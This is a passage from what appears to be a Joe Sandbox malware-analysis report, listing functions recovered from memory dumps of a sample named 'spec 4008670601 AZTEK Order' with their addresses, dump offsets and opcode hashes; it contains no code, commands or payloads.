                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 553781f9e3777b9d7df6b43abb166319b638b741d56e4873c86bd862baada693
                                                      • Instruction ID: a67453d0f31deb9b07733d0b3fa26dedf8858e937ce5a606e2c002833f9e6a54
                                                      • Opcode Fuzzy Hash: 553781f9e3777b9d7df6b43abb166319b638b741d56e4873c86bd862baada693
                                                      • Instruction Fuzzy Hash: 47413874E092498FDB40CFA9D4816EEFBF6BF49300F149129E559E7641D7309A81CBE0
                                                      Function 06DA4E3A Relevance: .1, Instructions: 119COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cd9e25720b12892948d41826fc6e5f57dd2598a4e8738f6980ce837977b45d33
                                                      • Instruction ID: a5c4bb79e34ebdbfd5c510a72ec6993660e2c4f3b7ee2c0cb03610191768d384
                                                      • Opcode Fuzzy Hash: cd9e25720b12892948d41826fc6e5f57dd2598a4e8738f6980ce837977b45d33
                                                      • Instruction Fuzzy Hash: 3541E574D19219DFDB80CFA8E4848AEBBF4FB4D300B01A859E496A7355D7B0E950CBA0
                                                      Function 06DA4E48 Relevance: .1, Instructions: 117COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 516d265cc3358275471399166fc9b0db1ac5b9524e00e0ce0a43a88431fdfc48
                                                      • Instruction ID: 9325fc46f804f986526c98b46e645c8a53b611877c6b018c71e3ec68eea87dcc
                                                      • Opcode Fuzzy Hash: 516d265cc3358275471399166fc9b0db1ac5b9524e00e0ce0a43a88431fdfc48
                                                      • Instruction Fuzzy Hash: BF410574D19219DFDB80CFA8E4848AEBBF4FF4D310B01A859E496A7355D7B0E950CBA0
                                                      Function 06DA570B Relevance: .1, Instructions: 108COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c63a8c6b0ed5cd77af354f21a5e1c0fad65f068f207b016c61470b81b2e066e4
                                                      • Instruction ID: 0120bbe450b50c6328448c0a87889a4b88161fa532f5a750f13cbc23381a5321
                                                      • Opcode Fuzzy Hash: c63a8c6b0ed5cd77af354f21a5e1c0fad65f068f207b016c61470b81b2e066e4
                                                      • Instruction Fuzzy Hash: 7A419A74E1522DDFDB85CFA9E888AEDBBB2BB0A300F509425E816F7250DB349941CF54
                                                      Function 06DA4FC6 Relevance: .1, Instructions: 104COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5a434f8dc86e5d93f6260526c1fb5dca8dcecbdf1b81f47b678daf4b0d3003a3
                                                      • Instruction ID: 708ddb759c7c632678a66343fc883ffc1375a6a0832abcc227bc27d68cd3523a
                                                      • Opcode Fuzzy Hash: 5a434f8dc86e5d93f6260526c1fb5dca8dcecbdf1b81f47b678daf4b0d3003a3
                                                      • Instruction Fuzzy Hash: B441F274D19219DFDB80CFA8E4888EDBBF0FF4D300B016859E496A7255DB70A950CB94
                                                      Function 06DA729C Relevance: .1, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 00b1530e2ef9ec241ed61382ce68aacaa1f3db77e1aa47df8aa631718120dfa1
                                                      • Instruction ID: 0638c6764e43fafb00b18f772d1be7173f61b900a934f8c80d200fd4bfc72f14
                                                      • Opcode Fuzzy Hash: 00b1530e2ef9ec241ed61382ce68aacaa1f3db77e1aa47df8aa631718120dfa1
                                                      • Instruction Fuzzy Hash: 81319130B043514BEB9A7BBD486476F25D7DFC4690B14083EE907DB3D5DE288D0283AA
                                                      Function 06DA72D4 Relevance: .1, Instructions: 100COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6db67f306e544952e78fe0771b812892ba6e0a555e46cf6d75ea6a64529a0259
                                                      • Instruction ID: 605cb12de70bdf9b286f8ac02d305038a34f56b7cf68514e02c6449eb350c31e
                                                      • Opcode Fuzzy Hash: 6db67f306e544952e78fe0771b812892ba6e0a555e46cf6d75ea6a64529a0259
                                                      • Instruction Fuzzy Hash: 7F315A71904308AFDF50DFA9C884A9EBFF9EF48310F10852AE915E7210D774A950CFA4
                                                      Function 06DA3518 Relevance: .1, Instructions: 99COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 131f2f71d7cc877a903489835c1540b23fdf6fb755fcebcbb19a9718456a7416
                                                      • Instruction ID: 20a41c3357d84436676e7a02f14e8448736954d55bb41ac00d4f3a6dbda90d5e
                                                      • Opcode Fuzzy Hash: 131f2f71d7cc877a903489835c1540b23fdf6fb755fcebcbb19a9718456a7416
                                                      • Instruction Fuzzy Hash: C1318235A002448FDB05DFA4C984AEE7BF2EF49304F5580A9E905EB366DB35ED05CB60
                                                      Function 06DAB350 Relevance: .1, Instructions: 90COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c910d9bd624fc791b233a50ced2097bba9783aaf6fdf5d4a9bac6073e48f6c63
                                                      • Instruction ID: 0651bb8478ad8b579828a94982def818e85ff37a4024a69d4a6ea5a55fde2e1b
                                                      • Opcode Fuzzy Hash: c910d9bd624fc791b233a50ced2097bba9783aaf6fdf5d4a9bac6073e48f6c63
                                                      • Instruction Fuzzy Hash: 1C31EA74D08248CFDB48CFAAC8456AEBFF6BF89300F14902AD419AB355DB709946CF80
                                                      Function 00B3D4C4 Relevance: .1, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114499997.0000000000B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b3d000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d35ced08e02c9d56563907af0dcaddb1d49eecb667a8e9e99d50e0d328f28c70
                                                      • Instruction ID: 91137f25e4d0acd786161046d9b137bdd2a4d9b647d4412fec79d24e9c4346ad
                                                      • Opcode Fuzzy Hash: d35ced08e02c9d56563907af0dcaddb1d49eecb667a8e9e99d50e0d328f28c70
                                                      • Instruction Fuzzy Hash: 0B212572604240EFDB05DF14E9C0B2ABFA5FB98318F30C5A9E9090B256C336D856CAA1
                                                      Function 06DA3170 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d1f27b6fa0e45e1450b09d087d3e12c2069b572192e88643982f07635b702523
                                                      • Instruction ID: 5f710ad8dd12ab2c76847df161016f996d169a0056e833ff34014f6189ba73b2
                                                      • Opcode Fuzzy Hash: d1f27b6fa0e45e1450b09d087d3e12c2069b572192e88643982f07635b702523
                                                      • Instruction Fuzzy Hash: D4219D756007159FC310CF69C8809ABBBF9FF89700B00856EE919DB350E770A945CBA0
                                                      Function 00B4D1D4 Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114559947.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b4d000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f36dd097dc8556f62af8dd625f4727332f7fbf8d6340cf00f769c2a47b0760d2
                                                      • Instruction ID: 3dbb0500af7c71671df8f985f6fea8f3b05a347d40a944a10165042349d26bfe
                                                      • Opcode Fuzzy Hash: f36dd097dc8556f62af8dd625f4727332f7fbf8d6340cf00f769c2a47b0760d2
                                                      • Instruction Fuzzy Hash: 36212675604304EFDB05DF14D9C0B26BBE5FB84314F20C6ADE9094B392C7B6D946DA61
                                                      Function 00B4D01C Relevance: .1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114559947.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b4d000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 810d6376ed37728839454622fdd178f94e4a158bd428ab1505d8296d36123cba
                                                      • Instruction ID: 2484b151d8c9fea01349deaf94ea43ce9f232346cad44816df03bdb8b7b93d21
                                                      • Opcode Fuzzy Hash: 810d6376ed37728839454622fdd178f94e4a158bd428ab1505d8296d36123cba
                                                      • Instruction Fuzzy Hash: 79213175604300EFCB14DF24D9D0B26BBA1FB88314F20C5ADE90A4B392C37AD907DA61
                                                      Function 06DA3CA4 Relevance: .1, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f224a398ba4b8f490a3a4583f00c11812e51bf5a5b9592f56d66416d4f9f29fc
                                                      • Instruction ID: df97677099bbbc7d0976f8ddbdac6a39a271736a666a14d3a112a1c271d02cda
                                                      • Opcode Fuzzy Hash: f224a398ba4b8f490a3a4583f00c11812e51bf5a5b9592f56d66416d4f9f29fc
                                                      • Instruction Fuzzy Hash: E531E0B0C04348DFEB60DF99C588B9EBFF4EB48714F24805AE405BB250C7B99845CB94
                                                      Function 06DA3180 Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 49acdb34bfb78ab2dfe398e0b54782411bc602de0956a92234ccd03d308d9931
                                                      • Instruction ID: 7b9717100c7ab23feac8f8f293a9a54b1a9be2a6c4783d187c15ddc05ef947e3
                                                      • Opcode Fuzzy Hash: 49acdb34bfb78ab2dfe398e0b54782411bc602de0956a92234ccd03d308d9931
                                                      • Instruction Fuzzy Hash: 28216A756007159BC324CF69C8809BBBBFAFF89700B00896DE9199B310E770ED45C7A0
                                                      Function 06DA6B8E Relevance: .1, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 66ffe080fef57862acef2c60b62be61561feae7cda55ddd2ac6f970667f466e4
                                                      • Instruction ID: 8c7287194f1528bd7b9d8636236da23897981777727a7b45422d8f67b2cb4a62
                                                      • Opcode Fuzzy Hash: 66ffe080fef57862acef2c60b62be61561feae7cda55ddd2ac6f970667f466e4
                                                      • Instruction Fuzzy Hash: B121C0B1C01358DFDB60DF99C588B8EBFF4EB48714F24805AE409BB250D7B99845CB95
                                                      Function 00B4D006 Relevance: .1, Instructions: 63COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114559947.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b4d000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c9d9616498f36ba39eb0450921001d9adc37d3d6ce19a2a124e5ae466200c656
                                                      • Instruction ID: d2e4724d389998b4dbaa34733fc257156bdb60020c65aa7969cef6977f61e26d
                                                      • Opcode Fuzzy Hash: c9d9616498f36ba39eb0450921001d9adc37d3d6ce19a2a124e5ae466200c656
                                                      • Instruction Fuzzy Hash: 492192755083809FCB02CF14D994B11BFB1EB46314F28C5DAD8498F2A7C33AD906CB62
                                                      Function 06DA726C Relevance: .1, Instructions: 62COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ec4007ac33a43822a7e340de8b6c853e7080530020536e31f5907f5e8cb7744d
                                                      • Instruction ID: 27ad86cf1556f878a201e0833aa3c97304ff4fb41d0381d6b44072e8be62dd16
                                                      • Opcode Fuzzy Hash: ec4007ac33a43822a7e340de8b6c853e7080530020536e31f5907f5e8cb7744d
                                                      • Instruction Fuzzy Hash: 2711CEB5A093849FDB85CFB48E9962E7FB4DB81201B2444EAA905C7291E930CE0487A1
                                                      Function 06DA4D70 Relevance: .1, Instructions: 61COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62acea30ae7a1608cd46971dfc77224abdb8a218956a93873522f0734b105959
                                                      • Instruction ID: 244441fd6cef7e571b6fa0aa38335ac126fb2b18a73ab4f316a8b3e7b2dde2f8
                                                      • Opcode Fuzzy Hash: 62acea30ae7a1608cd46971dfc77224abdb8a218956a93873522f0734b105959
                                                      • Instruction Fuzzy Hash: C621B474A10908DFC744DF5AE688999BBF1FF8C300B6280D5E448AB366DB71EE60DB04
                                                      Function 06DABCA0 Relevance: .1, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 64f97f6e7bb1bd6a17b810fb911b8cfda4e7be9aed72059847227eae773c79c9
                                                      • Instruction ID: a2bfe3b004e0a596933f04a8524456a69c64681849ed876a94dc4b61d8b4e369
                                                      • Opcode Fuzzy Hash: 64f97f6e7bb1bd6a17b810fb911b8cfda4e7be9aed72059847227eae773c79c9
                                                      • Instruction Fuzzy Hash: 9F21D8B8D08209CFCB84CFA9D181AAEBBF5EF49300F609156D849A7351D7709E41CF91
                                                      Function 06DA8C61 Relevance: .1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ee0cf9ecd8d48295c34849f8e264fa57e426ccdba1b32108983ebb9cb554345c
                                                      • Instruction ID: a1ee500440b1a43af4bdf2a43a2b0501ecb0ca7ad948011935094012f9a22578
                                                      • Opcode Fuzzy Hash: ee0cf9ecd8d48295c34849f8e264fa57e426ccdba1b32108983ebb9cb554345c
                                                      • Instruction Fuzzy Hash: 1C11C234A45600CFE764CF19C946B557BF1EF45310F558199D61A8F272DB32E801DF05
                                                      Function 06DA6908 Relevance: .1, Instructions: 58COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f0fecb0a2a3e23d16f078fbccab9dfbec819e32879d7d56f9b85056faa9c2c2e
                                                      • Instruction ID: 5031b2ba90a21de3191eb95e762604f49e0ea36a2491d14b801eb4d9c968916f
                                                      • Opcode Fuzzy Hash: f0fecb0a2a3e23d16f078fbccab9dfbec819e32879d7d56f9b85056faa9c2c2e
                                                      • Instruction Fuzzy Hash: 65114831F00649CBCB94EBB999116EEB7B6AB89211B14007AC544E7344EF328E02CBA0
                                                      Function 06DA69D8 Relevance: .1, Instructions: 57COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5b00eef5a94260299e272541f3249a1cbd06337afae67f7a822232fff6e6020d
                                                      • Instruction ID: 1ee0695f692d6ca9a0f60665697d158262acc4012f81e741737b1c2eca9c0d0b
                                                      • Opcode Fuzzy Hash: 5b00eef5a94260299e272541f3249a1cbd06337afae67f7a822232fff6e6020d
                                                      • Instruction Fuzzy Hash: 3411C2B6E007264B8B50DFB89D445BFBAF7EFC4250B158929E428D3344EF30C9058760
                                                      Function 06DA72E4 Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 38d1b253141e6c2c675efd72f60aca1185f35d44628d4140182db893e18fcf4a
                                                      • Instruction ID: b9849d95ec6e090fe982f8ab509c31ff0c78ca7f1207b6a7a89762ce70ba4391
                                                      • Opcode Fuzzy Hash: 38d1b253141e6c2c675efd72f60aca1185f35d44628d4140182db893e18fcf4a
                                                      • Instruction Fuzzy Hash: E82100B6804749DFDB60CF9AC884ADEBBF4FB48320F10841AE919B7210C374A954CFA5
                                                      Function 00B3D4BF Relevance: .1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114499997.0000000000B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b3d000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                      • Instruction ID: 23a6f07831c7d9aef017edd71bc9c9420101f24ca2f0d2cf6a93d7842e3ce566
                                                      • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                                      • Instruction Fuzzy Hash: 4011D376504280DFCB16CF10D5C4B16BFB1FB94318F34C6A9D8490B656C33AD856CBA1
                                                      Function 00B4D1CF Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114559947.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b4d000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                      • Instruction ID: 35d468255cf25249038d6d84bc2ba755dc11add48e2f0bf02d7592ddb4ece5f2
                                                      • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                      • Instruction Fuzzy Hash: E911BB75504280DFCB01CF10C5C4B15BBA1FB84314F24C6A9D8494B2A6C37AD80ACB61
                                                      Function 06DAC1D0 Relevance: .1, Instructions: 52COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 444c4acb9675ea1c63ae2d4346c019f6a9f51fc5c474d9600f45e1238dcfc6f1
                                                      • Instruction ID: 683b34de5b8e597b018096233c0bc0d3ad2e87b01504708a48a0884fdf1e996d
                                                      • Opcode Fuzzy Hash: 444c4acb9675ea1c63ae2d4346c019f6a9f51fc5c474d9600f45e1238dcfc6f1
                                                      • Instruction Fuzzy Hash: AB11B2B1D106188BEB18CFABC8457DEFAF6AFC8300F04C16AD40966264DB7409458F90
                                                      Function 06DABD58 Relevance: .0, Instructions: 50COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e89a33c6e021f9940f1fbd5796128000e304945b4c153facbee804026284ce0
                                                      • Instruction ID: 0ff84b4384c70f574d7648227879e9b4324e134a1af96e674296051f6da0ac12
                                                      • Opcode Fuzzy Hash: 0e89a33c6e021f9940f1fbd5796128000e304945b4c153facbee804026284ce0
                                                      • Instruction Fuzzy Hash: BA11F774D09208DFDB84DFA9C5409AEBBF9FF89310F10959A945AA7316D770DA42CF80
                                                      Function 06DA8C78 Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd02ded3a9b3319f511ded6ccf3148c03a769a698621e19f1ae77caf47f4dd50
                                                      • Instruction ID: 6898d868c829189f2016304913a78df76e01ac566e05563410ed9af050a995b3
                                                      • Opcode Fuzzy Hash: bd02ded3a9b3319f511ded6ccf3148c03a769a698621e19f1ae77caf47f4dd50
                                                      • Instruction Fuzzy Hash: F4018C30B49344CFE3498B29C815B163BB1AF86300F5981D6E6158F2B2CA61DC01CB01
                                                      Function 06DACBE8 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8e3a200524dab27373b0f0c7e1206b5c4e3873c953ab8cb61f819cf794ecfa5f
                                                      • Instruction ID: 5cadd976d820e1b636bde3788572bde9d4645314512da68855a28032f0091456
                                                      • Opcode Fuzzy Hash: 8e3a200524dab27373b0f0c7e1206b5c4e3873c953ab8cb61f819cf794ecfa5f
                                                      • Instruction Fuzzy Hash: 6A11B771E14218DFDB48CFAAD8459ADBBB6BF89301F00C16AE859A7355DB709901CF90
                                                      Function 00B3D759 Relevance: .0, Instructions: 45COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114499997.0000000000B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b3d000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8fe42175ffd3827ea9528d550fdc417a9c1d7e1d69dc7280fbaec66db0403ec1
                                                      • Instruction ID: 7f2614aa8564889dff125c89e6d31a53ad8206280e280b9191ace332afa6642a
                                                      • Opcode Fuzzy Hash: 8fe42175ffd3827ea9528d550fdc417a9c1d7e1d69dc7280fbaec66db0403ec1
                                                      • Instruction Fuzzy Hash: 1C01D6B1504344DAE7104B26EDC4B67FFD8EF41724F38C59AED095A296CBB99C40C6B1
                                                      Function 06DA07C0 Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b76ac455b5881d052c28cd5950d35e1cef383cca36535f322b701f530d92d67
                                                      • Instruction ID: 466df45a3aba33f28182dfd791639e3a975eb998902751bc35e0455799ee2502
